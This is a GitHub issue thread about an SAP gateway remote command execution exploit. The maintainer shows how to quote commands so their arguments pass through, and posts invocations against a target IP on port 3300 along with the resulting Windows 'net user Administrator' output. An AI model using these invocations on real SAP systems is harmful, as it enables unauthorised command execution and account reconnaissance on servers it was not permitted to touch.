Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Commands with space #1

Open
vsegdacocacola opened this issue Apr 23, 2020 · 1 comment
Open

Commands with space #1

vsegdacocacola opened this issue Apr 23, 2020 · 1 comment

Comments

@vsegdacocacola
Copy link

I am currently playing with exploit.
One word commands are working perfectly, but when I am trying to run commands with parameters, it seems it ignores them. For example, whoami returns me username, but whoami --help also return username.

Is it possible to encode command string to pass also parameters after space?
@randomstr1ng
Copy link

Hi @vsegdacocacola,
for me it works, when I try to send e.g. "net user Administrator" or "whoami /all"

Example 1:

python SAPanonGWv2.py -t 172.20.10.100 -c "net user Administrator" -p 3300
[INFO ] [+] Sending GW_NORMAL_CLIENT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_INIT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_SEND
[INFO ] [+] Sending F_SAP_SEND2
User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            30.03.2015 10:01:34
Password expires             11.05.2015 10:01:34
Password changeable          30.03.2015 10:01:34
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   30.03.2015 14:04:06

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

Example 2:

python SAPanonGWv1.py -t 172.20.10.100 -c "net user Administrator" -p 3300
[*] sending cmd:net user Administrator
User name                    Administrator

Full Name
TComment                      Built-in account for administering the computer/domain
User's comment
2Country/region code          000 (System Default)
!Account active               Yes
#Account expires              Never

1Password last set            30.03.2015 10:01:34
1Password expires             11.05.2015 10:01:34
1Password changeable          30.03.2015 10:01:34
!Password required            Yes
!User may change password     Yes

!Workstations allowed         All
Logon script
User profile
Home directory
1Last logon                   30.03.2015 14:04:06

!Logon hours allowed          All

-Local Group Memberships      *Administrators
#Global Group memberships     *None
$The command completed successfully.

The Quotes did the trick for me. Maybe this will help you.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@vsegdacocacola @randomstr1ng